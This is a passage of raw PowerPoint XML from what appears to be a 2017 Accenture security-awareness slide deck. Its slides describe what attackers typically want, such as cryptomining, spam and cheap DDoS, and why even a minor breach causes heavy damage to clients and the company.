              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="3519207" y="3101604"/>
              <a:ext cx="281045" cy="281045"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Picture 26"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="9666802" y="3750733"/>
              <a:ext cx="305598" cy="305598"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Picture 27"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="7816139" y="4064416"/>
              <a:ext cx="181739" cy="181739"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 28"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="5430870" y="2696706"/>
              <a:ext cx="181739" cy="181739"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 29"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="3482661">
              <a:off x="3694788" y="3839358"/>
              <a:ext cx="182579" cy="182579"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Picture 30"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="ED1C24"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="ED1C24">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10387278" y="-1634249"/>
              <a:ext cx="4421824" cy="4421824"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="grayWhite">
          <a:xfrm>
            <a:off x="0" y="370284"/>
            <a:ext cx="11568608" cy="6172199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11000" dirty="0"/>
              <a:t>The imbalance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="11000" dirty="0"/>
              <a:t>Of </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>versus </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12221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4800600" y="284723"/>
            <a:ext cx="6477000" cy="1086879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What lots of hackers actually want and therefore what they actually do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="1828802"/>
            <a:ext cx="8163271" cy="4689475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="512761" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Many hackers want to make money by indiscriminately stealing compute resources. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="512761" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="512761" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using other people’s servers to mine bitcoins or perform attacks on sites (perhaps for money), or send spam e.g. phishing attacks.  Or in general do illegal things they would rather do for free on someone else’s servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Level 1 – doing things on your servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Level 2 – creating (lots) more servers in your cloud account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="512761" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacks are fully automated because on the Darkweb DDoS attacks can be bought for only $5 per hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="107948" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="107948" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8688288" y="1628800"/>
            <a:ext cx="3293826" cy="4391768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212815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0" y="1052736"/>
            <a:ext cx="5498976" cy="4689475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker is basically running scripts anonymously </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They might send some spam from your machine and maybe even some extra machines they create.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You find out and shut them down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>They move on, maybe they didn’t even look at logs and see they attacked you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="380999"/>
            <a:ext cx="12267728" cy="990601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The imbalance of damage </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent5">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="177678" y="4294124"/>
            <a:ext cx="5414265" cy="24307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Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1052736"/>
            <a:ext cx="5715000" cy="5544617"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The damage to us is FAR GREATER IN SO MANY WAYS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>No matter what they do, this implicitly includes our client and CLIENT DATA.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Even if it appears that only spam was generated, CLIENT DATA was potentially exposed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perhaps they added some cloud charges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The actions on your (the CLIENT’s) servers was illegal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You had to stop your normal work to stop the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You had to spend a long time working out what happened, documenting it and informing ASOC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You had to explain what happened it to senior people (you didn’t even knew existed).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All your normal code and processes come under scrutiny. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Loss of Accenture reputation and faith in DCSC!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8688288" y="177013"/>
            <a:ext cx="3647728" cy="20398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0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>much worse for us</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37516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4800600" y="284723"/>
            <a:ext cx="6477000" cy="1086879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What lots of hackers actually want and therefore what they actually do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="3190619"/>
            <a:ext cx="8019255" cy="3328390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Purely for the “lulz”, or motivated by status, commercially or politically sites the hackers may want to get into your servers not to use them, to access / change / delete / steal and publish / sell the content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Change websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Reveal confidential information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Sabotage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Steal of the secrets to gain further account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8283128" y="2712543"/>
            <a:ext cx="3672408" cy="3164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479376" y="1772816"/>
            <a:ext cx="7632848" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Of course some hackers are also looking to change, steal or destroy intellectual property </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40074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Titl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no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Master_Arial_2017 v1" id="{BFFC7005-D7BE-40E3-83B0-367A400EF32B}" vid="{EE94AFD5-8C99-4A57-B246-21C8F75E9D6A}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.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Master_Arial_2017 v1" id="{BFFC7005-D7BE-40E3-83B0-367A400EF32B}" vid="{9EDCCE36-7FD1-489E-AC77-A235F91A6269}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Section Divider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no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Master_Arial_2017 v1" id="{BFFC7005-D7BE-40E3-83B0-367A400EF32B}" vid="{84A28C10-F074-4455-88A8-3B2F726495FD}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Specialty Slid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no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Master_Arial_2017 v1" id="{BFFC7005-D7BE-40E3-83B0-367A400EF32B}" vid="{9BE5F91C-68CE-4069-A9A7-D9EDC1AA279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18B4BFBE44CB4787AA86045C9A6063" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="907aab2d9ea0650ff8ff7406fdc26b47">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="9b901641-0d09-466e-84cb-a5070d83a351" xmlns:ns3="654ae466-f20b-489a-860c-ab06bbeb57a1" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b5ccca5cb7444fd9b29b3d642876a9f6" ns2:_="" ns3:_="">
    <xsd:import namespace="9b901641-0d09-466e-84cb-a5070d83a351"/>
    <xsd:import namespace="654ae466-f20b-489a-860c-ab06bbeb57a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01641-0d09-466e-84cb-a5070d83a3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54ae466-f20b-489a-860c-ab06bbeb57a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2A4A5A-505F-42B2-8B5D-159BF66CD655}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{87556947-8902-4444-A6B3-15FF796AE173}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{ADDF9832-BD6D-4ECF-94D9-09D5AC695401}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
